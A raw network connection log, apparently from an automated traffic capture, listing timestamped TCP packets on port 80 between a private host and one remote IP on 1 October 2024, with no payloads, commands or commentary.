Oct 1, 2024 19:32:15.777945042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.777951002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.777956009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778002024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778019905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778036118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778075933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778075933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778213024 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778224945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778234959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778244972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778255939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778268099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778268099 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778268099 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778280020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778290033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778312922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778338909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778338909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778354883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778371096 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778382063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778393030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778403997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778414011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778414011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778414965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778429985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778439045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778449059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778449059 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778460026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778466940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778469086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778482914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778491974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778493881 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778503895 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778507948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778517962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778532982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778532982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778536081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778552055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778563976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778574944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778574944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778574944 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778585911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778603077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778609991 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778616905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778628111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778646946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778650045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778650045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778657913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778671026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778681993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778693914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778693914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778700113 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778709888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778709888 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778721094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778744936 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778755903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778762102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778762102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778764009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778774023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778786898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778791904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778796911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.778817892 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778848886 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.778848886 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.901643991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.901659966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.901668072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.901772022 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.901781082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.901823997 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.901830912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.901839972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.901879072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.901879072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.901982069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.901997089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902007103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902018070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902028084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902038097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902038097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902038097 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902051926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902061939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902074099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902074099 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902084112 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902095079 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902103901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902112007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902112007 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902113914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902122974 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902133942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902143955 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902143955 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902147055 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902157068 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902162075 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902169943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902180910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902184010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902184010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902189970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902199030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902209997 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902229071 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902240992 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902298927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902308941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902318001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902328014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902345896 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902359962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902368069 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902370930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902378082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902386904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902411938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902417898 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902417898 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902421951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902431011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902441025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902467012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902467012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902472973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902487993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902497053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902514935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902514935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902530909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902539015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902539968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902549028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902559042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902573109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902579069 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902582884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902620077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902622938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902622938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902631998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902686119 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902714014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902724981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902733088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902740955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902751923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902753115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902765989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902775049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902784109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902791977 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902792931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902802944 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902812004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902822018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902822018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902848005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902872086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902915001 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902920961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902930021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.902987957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.902997017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903006077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903016090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903031111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903032064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903032064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903042078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903050900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903058052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903062105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903072119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903079987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903090000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903091908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903091908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903110027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903127909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903131962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903134108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903146029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903171062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903171062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903186083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903189898 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903202057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903211117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903240919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903240919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903265953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903266907 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903276920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903287888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903312922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903312922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903321028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903328896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903330088 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903333902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903352976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903373957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903397083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903403997 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903450012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903454065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903465986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903506041 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903506041 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903557062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903575897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903585911 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903595924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903605938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903605938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903605938 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903620005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903630972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903640985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903640985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903651953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903678894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903678894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903702021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903740883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903749943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903763056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903772116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903781891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903784990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903790951 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903800964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903804064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903804064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903811932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903851032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903851032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903899908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903911114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903919935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903932095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.903970957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.903970957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.904036045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.904046059 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.904055119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.904064894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.904073000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.904083014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.904093027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.904093027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.904094934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.904134035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.904134035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.904136896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.904191017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.904216051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.904230118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.904238939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.904248953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.904259920 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.904263020 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.904263020 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.904284000 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.904313087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.993697882 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.993709087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.993717909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.993741035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.993751049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.993762016 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.993771076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.993796110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.993803024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.993807077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.993818045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.993845940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.993845940 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.993860006 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.994008064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.994018078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.994028091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.994038105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.994048119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.994057894 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.994061947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.994061947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.994069099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:15.994103909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:15.994103909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.026134968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.026145935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.026155949 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.026165009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.026175022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.026189089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.026227951 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.026237011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.026246071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.026254892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.026298046 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.026298046 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.026341915 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.026350975 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.026360035 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.026371002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.026395082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.026395082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.026426077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.026427984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:16.026436090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.026444912 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.026454926 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.026465893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:16.026475906 CEST	49704	80	192.168.2.5	185.215.113.37
